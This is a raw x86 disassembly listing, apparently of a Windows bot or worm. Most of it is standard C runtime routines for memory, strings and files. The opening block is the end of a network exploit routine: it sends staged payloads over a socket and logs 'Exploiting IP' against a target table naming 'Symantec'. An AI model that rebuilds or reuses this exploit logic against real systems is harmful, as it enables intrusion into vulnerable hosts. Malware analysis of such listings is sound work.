loc_41B7D0: ; CODE XREF: .text:0041B794�j
lea eax, [ebp-38h]
push eax
lea eax, [ebp-88h]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_41B820
lea eax, [ebp-38h]
push esi
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp-38h]
push eax
push ebx
call dword_4CBA24 ; send
push 1
pop edi
loc_41B800: ; CODE XREF: .text:0041B79C�j
cmp edi, 3
jz short loc_41B82E
jmp loc_41B75C
; ---------------------------------------------------------------------------
loc_41B80A: ; CODE XREF: .text:0041B79A�j
lea eax, [ebp-28h]
push eax
lea eax, [ebp-88h]
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_41B82E
loc_41B820: ; CODE XREF: .text:0041B756�j
; .text:0041B7B2�j ...
push ebx
call dword_4CBA6C ; closesocket
xor eax, eax
jmp loc_41B9B7
; ---------------------------------------------------------------------------
loc_41B82E: ; CODE XREF: .text:0041B781�j
; .text:0041B78A�j ...
push esi
lea eax, [ebp-16h]
push 1
push eax
push ebx
call dword_4CBA24 ; send
lea eax, [ebp-10h]
push 1
push eax
push ebx
call sub_41B55B
mov esi, ds:dword_427080
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; Sleep
lea eax, [ebp-18h]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push edi
call esi ; Sleep
lea eax, [ebp-10h]
push 2
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push edi
call esi ; Sleep
and dword ptr [ebp-4], 0
mov edi, offset byte_4DBCCC
push edi
call sub_41B9C0
test eax, eax
pop ecx
jbe short loc_41B8CE
loc_41B891: ; CODE XREF: .text:0041B8CC�j
mov eax, [ebp-4]
movsx eax, byte_4DBCCC[eax]
push eax
push offset dword_43ADD8
lea eax, [ebp-20h]
push 3
push eax
call sub_41C360
lea eax, [ebp-20h]
push 0
push eax
push ebx
call sub_41B55B
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push edi
call sub_41B9C0
cmp [ebp-4], eax
pop ecx
jb short loc_41B891
loc_41B8CE: ; CODE XREF: .text:0041B88F�j
lea eax, [ebp-0Ch]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push 0FA0h
call esi ; Sleep
push 2
pop edi
loc_41B8E7: ; CODE XREF: .text:0041B8FE�j
lea eax, [ebp-14h]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push 12Ch
call esi ; Sleep
dec edi
jnz short loc_41B8E7
mov edi, 7D0h
push edi
call esi ; Sleep
lea eax, [ebp-0Ch]
push 0
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push edi
call esi ; Sleep
xor edi, edi
lea eax, [ebp-14h]
push edi
push eax
push ebx
call sub_41B55B
add esp, 0Ch
push 190h
call esi ; Sleep
mov dword ptr [ebp-4], 2
loc_41B938: ; CODE XREF: .text:0041B950�j
push 258h
call esi ; Sleep
lea eax, [ebp-0Ch]
push edi
push eax
push ebx
call sub_41B55B
add esp, 0Ch
dec dword ptr [ebp-4]
jnz short loc_41B938
push ebx
call dword_4CBA6C ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-288h]
push 1FFh
push eax
call sub_41C360
push edi
lea eax, [ebp-288h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
mov eax, [ebp+0B0h]
add esp, 28h
shl eax, 6
inc dword_431800[eax]
push 1
lea eax, dword_431800[eax]
pop eax
loc_41B9B7: ; CODE XREF: .text:0041B829�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B9C0 proc near ; CODE XREF: sub_401000+34�p
; sub_401221+14D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_41B9E0
loc_41B9CC: ; CODE XREF: sub_41B9C0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41BA13
test ecx, 3
jnz short loc_41B9CC
add eax, 0
loc_41B9E0: ; CODE XREF: sub_41B9C0+A�j
; sub_41B9C0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41B9E0
mov eax, [ecx-4]
test al, al
jz short loc_41BA31
test ah, ah
jz short loc_41BA27
test eax, 0FF0000h
jz short loc_41BA1D
test eax, 0FF000000h
jz short loc_41BA13
jmp short loc_41B9E0
; ---------------------------------------------------------------------------
loc_41BA13: ; CODE XREF: sub_41B9C0+11�j
; sub_41B9C0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41BA1D: ; CODE XREF: sub_41B9C0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41BA27: ; CODE XREF: sub_41B9C0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41BA31: ; CODE XREF: sub_41B9C0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_41B9C0 endp
; =============== S U B R O U T I N E =======================================
sub_41BA3B proc near ; CODE XREF: sub_4010AB+64�p
; sub_401ACD+5809�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_41BA50
or eax, 0FFFFFFFFh
jmp short loc_41BA8A
; ---------------------------------------------------------------------------
loc_41BA50: ; CODE XREF: sub_41BA3B+E�j
test al, 83h
jz short loc_41BA88
push esi
call sub_41E42B
push esi
mov edi, eax
call sub_41E3C5
push dword ptr [esi+10h]
call sub_41E312
add esp, 0Ch
test eax, eax
jge short loc_41BA76
or edi, 0FFFFFFFFh
jmp short loc_41BA88
; ---------------------------------------------------------------------------
loc_41BA76: ; CODE XREF: sub_41BA3B+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_41BA88
push eax
call sub_41BA91
and dword ptr [esi+1Ch], 0
pop ecx
loc_41BA88: ; CODE XREF: sub_41BA3B+17�j
; sub_41BA3B+39�j ...
mov eax, edi
loc_41BA8A: ; CODE XREF: sub_41BA3B+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_41BA3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA91 proc near ; CODE XREF: sub_4010AB+5E�p
; sub_40A928+B1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_41BAF7
mov eax, dword_4DD388
cmp eax, 3
jnz short loc_41BABD
push esi
call sub_41E717
pop ecx
test eax, eax
push esi
jz short loc_41BAE9
push eax
call sub_41E742
pop ecx
pop ecx
jmp short loc_41BAF7
; ---------------------------------------------------------------------------
loc_41BABD: ; CODE XREF: sub_41BA91+14�j
cmp eax, 2
jnz short loc_41BAE8
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_41F472
add esp, 0Ch
test eax, eax
jz short loc_41BAE8
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_41F4C9
add esp, 0Ch
jmp short loc_41BAF7
; ---------------------------------------------------------------------------
loc_41BAE8: ; CODE XREF: sub_41BA91+2F�j
; sub_41BA91+44�j
push esi
loc_41BAE9: ; CODE XREF: sub_41BA91+20�j
push 0
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
loc_41BAF7: ; CODE XREF: sub_41BA91+A�j
; sub_41BA91+2A�j ...
pop esi
leave
retn
sub_41BA91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAFA proc near ; CODE XREF: sub_4010AB+45�p
; sub_40FA3C+4E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_41BB1E
xor eax, eax
jmp loc_41BBC7
; ---------------------------------------------------------------------------
loc_41BB1E: ; CODE XREF: sub_41BAFA+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41BB31
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41BB3D
; ---------------------------------------------------------------------------
loc_41BB31: ; CODE XREF: sub_41BAFA+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_41BB3D
; ---------------------------------------------------------------------------
loc_41BB3A: ; CODE XREF: sub_41BAFA+C4�j
mov ecx, [ebp+arg_0]
loc_41BB3D: ; CODE XREF: sub_41BAFA+35�j
; sub_41BAFA+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_41BB6F
mov eax, [esi+4]
test eax, eax
jz short loc_41BB6F
cmp ecx, eax
mov edi, ecx
jb short loc_41BB54
mov edi, eax
loc_41BB54: ; CODE XREF: sub_41BAFA+56�j
push edi
push dword ptr [esi]
push ebx
call sub_41CD20
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_41BBBA
; ---------------------------------------------------------------------------
loc_41BB6F: ; CODE XREF: sub_41BAFA+49�j
; sub_41BAFA+50�j
cmp ecx, [ebp+arg_C]
jb short loc_41BBA2
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_41BB85
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_41BB85: ; CODE XREF: sub_41BAFA+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41F9BC
add esp, 0Ch
test eax, eax
jz short loc_41BBCC
cmp eax, 0FFFFFFFFh
jz short loc_41BBD2
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_41BBBA
; ---------------------------------------------------------------------------
loc_41BBA2: ; CODE XREF: sub_41BAFA+78�j
push esi
call sub_41F8E3
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41BBD6
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_41BBBA: ; CODE XREF: sub_41BAFA+73�j
; sub_41BAFA+A6�j
cmp [ebp+arg_0], 0
jnz loc_41BB3A
mov eax, [ebp+arg_8]
loc_41BBC7: ; CODE XREF: sub_41BAFA+1F�j
; sub_41BAFA+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41BBCC: ; CODE XREF: sub_41BAFA+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_41BBD6
; ---------------------------------------------------------------------------
loc_41BBD2: ; CODE XREF: sub_41BAFA+9F�j
or dword ptr [esi+0Ch], 20h
loc_41BBD6: ; CODE XREF: sub_41BAFA+B2�j
; sub_41BAFA+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_41BBC7
sub_41BAFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBE2 proc near ; CODE XREF: sub_4010AB+2E�p
; sub_41D9B3+35�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_41BBFD
push [ebp+arg_4]
call sub_41BEB5
pop ecx
jmp loc_41BE7D
; ---------------------------------------------------------------------------
loc_41BBFD: ; CODE XREF: sub_41BBE2+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_41BC12
push [ebp+arg_0]
call sub_41BA91
pop ecx
jmp loc_41BE7B
; ---------------------------------------------------------------------------
loc_41BC12: ; CODE XREF: sub_41BBE2+20�j
mov eax, dword_4DD388
cmp eax, 3
jnz loc_41BD22
loc_41BC20: ; CODE XREF: sub_41BBE2+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41BCFE
push [ebp+arg_0]
call sub_41E717
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_41BCD9
cmp esi, dword_4DD380
ja short loc_41BC92
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41EF20
add esp, 0Ch
test eax, eax
jnz short loc_41BC8E
push esi
call sub_41EA6B
mov edi, eax
pop ecx
test edi, edi
jz short loc_41BC92
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_41BC72
mov eax, esi
loc_41BC72: ; CODE XREF: sub_41BBE2+8C�j
push eax
push ebx
push edi
call sub_41CD20
push ebx
call sub_41E717
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_41E742
add esp, 18h
loc_41BC8E: ; CODE XREF: sub_41BBE2+74�j
test edi, edi
jnz short loc_41BCD5
loc_41BC92: ; CODE XREF: sub_41BBE2+62�j
; sub_41BBE2+81�j
test esi, esi
jnz short loc_41BC99
push 1
pop esi
loc_41BC99: ; CODE XREF: sub_41BBE2+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41BCD5
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41BCC1
mov eax, esi
loc_41BCC1: ; CODE XREF: sub_41BBE2+DB�j
push eax
push ecx
push edi
call sub_41CD20
push [ebp+arg_0]
push ebx
call sub_41E742
add esp, 14h
loc_41BCD5: ; CODE XREF: sub_41BBE2+AE�j
; sub_41BBE2+D0�j
test ebx, ebx
jnz short loc_41BCFA
loc_41BCD9: ; CODE XREF: sub_41BBE2+56�j
test esi, esi
jnz short loc_41BCE0
push 1
pop esi
loc_41BCE0: ; CODE XREF: sub_41BBE2+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
mov edi, eax
loc_41BCFA: ; CODE XREF: sub_41BBE2+F5�j
test edi, edi
jnz short loc_41BD1B
loc_41BCFE: ; CODE XREF: sub_41BBE2+43�j
cmp dword_4DBE48, 0
jz short loc_41BD1B
push esi
call sub_41FBB2
test eax, eax
pop ecx
jnz loc_41BC20
jmp loc_41BE7B
; ---------------------------------------------------------------------------
loc_41BD1B: ; CODE XREF: sub_41BBE2+11A�j
; sub_41BBE2+123�j ...
mov eax, edi
jmp loc_41BE7D
; ---------------------------------------------------------------------------
loc_41BD22: ; CODE XREF: sub_41BBE2+38�j
cmp eax, 2
jnz loc_41BE3D
cmp esi, 0FFFFFFE0h
ja short loc_41BD3F
test esi, esi
jbe short loc_41BD3C
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_41BD3F
; ---------------------------------------------------------------------------
loc_41BD3C: ; CODE XREF: sub_41BBE2+150�j
push 10h
pop esi
loc_41BD3F: ; CODE XREF: sub_41BBE2+14C�j
; sub_41BBE2+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41BE1F
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41F472
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_41BE03
cmp esi, dword_43CE74
jnb short loc_41BDC7
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41F83A
add esp, 10h
test eax, eax
jz short loc_41BD8D
mov edi, [ebp+arg_0]
jmp short loc_41BDBF
; ---------------------------------------------------------------------------
loc_41BD8D: ; CODE XREF: sub_41BBE2+1A4�j
push edi
call sub_41F50E
mov edi, eax
pop ecx
test edi, edi
jz short loc_41BDC7
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_41BDA6
mov eax, esi
loc_41BDA6: ; CODE XREF: sub_41BBE2+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_41CD20
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41F4C9
add esp, 18h
loc_41BDBF: ; CODE XREF: sub_41BBE2+1A9�j
test edi, edi
jnz loc_41BD1B
loc_41BDC7: ; CODE XREF: sub_41BBE2+18B�j
; sub_41BBE2+1B6�j
push esi
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41BE1F
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_41BDE8
mov eax, esi
loc_41BDE8: ; CODE XREF: sub_41BBE2+202�j
push eax
push [ebp+arg_0]
push edi
call sub_41CD20
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41F4C9
add esp, 18h
jmp short loc_41BE17
; ---------------------------------------------------------------------------
loc_41BE03: ; CODE XREF: sub_41BBE2+17F�j
push esi
push [ebp+arg_0]
push 0
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
mov edi, eax
loc_41BE17: ; CODE XREF: sub_41BBE2+21F�j
test edi, edi
jnz loc_41BD1B
loc_41BE1F: ; CODE XREF: sub_41BBE2+162�j
; sub_41BBE2+1F8�j
cmp dword_4DBE48, 0
jz loc_41BD1B
push esi
call sub_41FBB2
test eax, eax
pop ecx
jnz loc_41BD3F
jmp short loc_41BE7B
; ---------------------------------------------------------------------------
loc_41BE3D: ; CODE XREF: sub_41BBE2+143�j
; sub_41BBE2+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_41BE67
test esi, esi
jnz short loc_41BE4B
push 1
pop esi
loc_41BE4B: ; CODE XREF: sub_41BBE2+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
test eax, eax
jnz short loc_41BE7D
loc_41BE67: ; CODE XREF: sub_41BBE2+260�j
cmp dword_4DBE48, 0
jz short loc_41BE7D
push esi
call sub_41FBB2
test eax, eax
pop ecx
jnz short loc_41BE3D
loc_41BE7B: ; CODE XREF: sub_41BBE2+2B�j
; sub_41BBE2+134�j ...
xor eax, eax
loc_41BE7D: ; CODE XREF: sub_41BBE2+16�j
; sub_41BBE2+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BBE2 endp
; =============== S U B R O U T I N E =======================================
sub_41BE82 proc near ; CODE XREF: sub_41BEA2+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41FD3D
test eax, eax
jnz short loc_41BE8C
retn
; ---------------------------------------------------------------------------
loc_41BE8C: ; CODE XREF: sub_41BE82+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41FBCD
add esp, 10h
retn
sub_41BE82 endp
; =============== S U B R O U T I N E =======================================
sub_41BEA2 proc near ; CODE XREF: sub_4010AB+18�p
; sub_401ACD+57DD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41BE82
add esp, 0Ch
retn
sub_41BEA2 endp
; =============== S U B R O U T I N E =======================================
sub_41BEB5 proc near ; CODE XREF: sub_4010AB+6�p
; sub_40A928+63�p ...
arg_0 = dword ptr 4
push dword_4DBE48
push [esp+4+arg_0]
call sub_41BEC7
pop ecx
pop ecx
retn
sub_41BEB5 endp
; =============== S U B R O U T I N E =======================================
sub_41BEC7 proc near ; CODE XREF: sub_41BEB5+A�p
; sub_41D9A5+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_41BEF0
loc_41BECE: ; CODE XREF: sub_41BEC7+27�j
push [esp+arg_0]
call sub_41BEF3
test eax, eax
pop ecx
jnz short locret_41BEF2
cmp [esp+arg_4], eax
jz short locret_41BEF2
push [esp+arg_0]
call sub_41FBB2
test eax, eax
pop ecx
jnz short loc_41BECE
loc_41BEF0: ; CODE XREF: sub_41BEC7+5�j
xor eax, eax
locret_41BEF2: ; CODE XREF: sub_41BEC7+13�j
; sub_41BEC7+19�j
retn
sub_41BEC7 endp
; =============== S U B R O U T I N E =======================================
sub_41BEF3 proc near ; CODE XREF: sub_41BEC7+B�p
arg_0 = dword ptr 4
mov eax, dword_4DD388
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_41BF17
cmp esi, dword_4DD380
ja short loc_41BF49
push esi
call sub_41EA6B
test eax, eax
pop ecx
jz short loc_41BF49
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BF17: ; CODE XREF: sub_41BEF3+D�j
cmp eax, 2
jnz short loc_41BF49
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_41BF2C
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_41BF2F
; ---------------------------------------------------------------------------
loc_41BF2C: ; CODE XREF: sub_41BEF3+2F�j
push 10h
pop esi
loc_41BF2F: ; CODE XREF: sub_41BEF3+37�j
cmp esi, dword_43CE74
ja short loc_41BF56
mov eax, esi
shr eax, 4
push eax
call sub_41F50E
test eax, eax
pop ecx
jnz short loc_41BF65
jmp short loc_41BF56
; ---------------------------------------------------------------------------
loc_41BF49: ; CODE XREF: sub_41BEF3+15�j
; sub_41BEF3+20�j ...
test esi, esi
jnz short loc_41BF50
push 1
pop esi
loc_41BF50: ; CODE XREF: sub_41BEF3+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41BF56: ; CODE XREF: sub_41BEF3+42�j
; sub_41BEF3+54�j
push esi
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
loc_41BF65: ; CODE XREF: sub_41BEF3+52�j
pop esi
retn
sub_41BEF3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BF70 proc near ; CODE XREF: sub_40111D+3C�p
; sub_40111D+4A�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41BFC3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41BFB7
neg ecx
and ecx, 3
jz short loc_41BF99
sub edx, ecx
loc_41BF93: ; CODE XREF: sub_41BF70+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_41BF93
loc_41BF99: ; CODE XREF: sub_41BF70+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41BFB7
rep stosd
test edx, edx
jz short loc_41BFBD
loc_41BFB7: ; CODE XREF: sub_41BF70+18�j
; sub_41BF70+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_41BFB7
loc_41BFBD: ; CODE XREF: sub_41BF70+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41BFC3: ; CODE XREF: sub_41BF70+A�j
mov eax, [esp+arg_0]
retn
sub_41BF70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BFD0 proc near ; CODE XREF: sub_401221+49F�p
; sub_401221+4BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_41C053
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_41BFF4
shr ecx, 2
jnz short loc_41C061
jmp short loc_41C015
; ---------------------------------------------------------------------------
loc_41BFF4: ; CODE XREF: sub_41BFD0+1B�j
; sub_41BFD0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_41C022
test al, al
jz short loc_41C02A
test esi, 3
jnz short loc_41BFF4
mov ebx, ecx
shr ecx, 2
jnz short loc_41C061
loc_41C010: ; CODE XREF: sub_41BFD0+8F�j
and ebx, 3
jz short loc_41C022
loc_41C015: ; CODE XREF: sub_41BFD0+22�j
; sub_41BFD0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_41C04E
dec ebx
jnz short loc_41C015
loc_41C022: ; CODE XREF: sub_41BFD0+2B�j
; sub_41BFD0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C02A: ; CODE XREF: sub_41BFD0+2F�j
test edi, 3
jz short loc_41C044
loc_41C032: ; CODE XREF: sub_41BFD0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_41C0C6
test edi, 3
jnz short loc_41C032
loc_41C044: ; CODE XREF: sub_41BFD0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_41C0B7
loc_41C04B: ; CODE XREF: sub_41BFD0+7F�j
; sub_41BFD0+F4�j
mov [edi], al
inc edi
loc_41C04E: ; CODE XREF: sub_41BFD0+4D�j
dec ebx
jnz short loc_41C04B
pop ebx
pop esi
loc_41C053: ; CODE XREF: sub_41BFD0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C059: ; CODE XREF: sub_41BFD0+A9�j
; sub_41BFD0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41C010
loc_41C061: ; CODE XREF: sub_41BFD0+20�j
; sub_41BFD0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41C059
test dl, dl
jz short loc_41C0AB
test dh, dh
jz short loc_41C0A1
test edx, 0FF0000h
jz short loc_41C097
test edx, 0FF000000h
jnz short loc_41C059
mov [edi], edx
jmp short loc_41C0AF
; ---------------------------------------------------------------------------
loc_41C097: ; CODE XREF: sub_41BFD0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41C0AF
; ---------------------------------------------------------------------------
loc_41C0A1: ; CODE XREF: sub_41BFD0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41C0AF
; ---------------------------------------------------------------------------
loc_41C0AB: ; CODE XREF: sub_41BFD0+AD�j
xor edx, edx
mov [edi], edx
loc_41C0AF: ; CODE XREF: sub_41BFD0+C5�j
; sub_41BFD0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_41C0C1
loc_41C0B7: ; CODE XREF: sub_41BFD0+79�j
xor eax, eax
loc_41C0B9: ; CODE XREF: sub_41BFD0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_41C0B9
loc_41C0C1: ; CODE XREF: sub_41BFD0+E5�j
and ebx, 3
jnz short loc_41C04B
loc_41C0C6: ; CODE XREF: sub_41BFD0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41BFD0 endp
; =============== S U B R O U T I N E =======================================
sub_41C0CE proc near ; CODE XREF: sub_41C159+4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_41C0D6: ; CODE XREF: sub_41C0CE+34�j
cmp dword_43D084, 1
jle short loc_41C0EE
movzx eax, byte ptr [edi]
push 8
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_41C0FD
; ---------------------------------------------------------------------------
loc_41C0EE: ; CODE XREF: sub_41C0CE+F�j
movzx eax, byte ptr [edi]
mov ecx, off_43CE78
mov al, [ecx+eax*2]
and eax, 8
loc_41C0FD: ; CODE XREF: sub_41C0CE+1E�j
test eax, eax
jz short loc_41C104
inc edi
jmp short loc_41C0D6
; ---------------------------------------------------------------------------
loc_41C104: ; CODE XREF: sub_41C0CE+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_41C114
cmp esi, 2Bh
jnz short loc_41C118
loc_41C114: ; CODE XREF: sub_41C0CE+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_41C118: ; CODE XREF: sub_41C0CE+44�j
xor ebx, ebx
loc_41C11A: ; CODE XREF: sub_41C0CE+7B�j
cmp dword_43D084, 1
jle short loc_41C12F
push 4
push esi
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_41C13A
; ---------------------------------------------------------------------------
loc_41C12F: ; CODE XREF: sub_41C0CE+53�j
mov eax, off_43CE78
mov al, [eax+esi*2]
and eax, 4
loc_41C13A: ; CODE XREF: sub_41C0CE+5F�j
test eax, eax
jz short loc_41C14B
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_41C11A
; ---------------------------------------------------------------------------
loc_41C14B: ; CODE XREF: sub_41C0CE+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_41C154
neg eax
loc_41C154: ; CODE XREF: sub_41C0CE+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41C0CE endp
; =============== S U B R O U T I N E =======================================
sub_41C159 proc near ; CODE XREF: sub_401221+306�p
; sub_401ACD+717�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41C0CE
pop ecx
retn
sub_41C159 endp
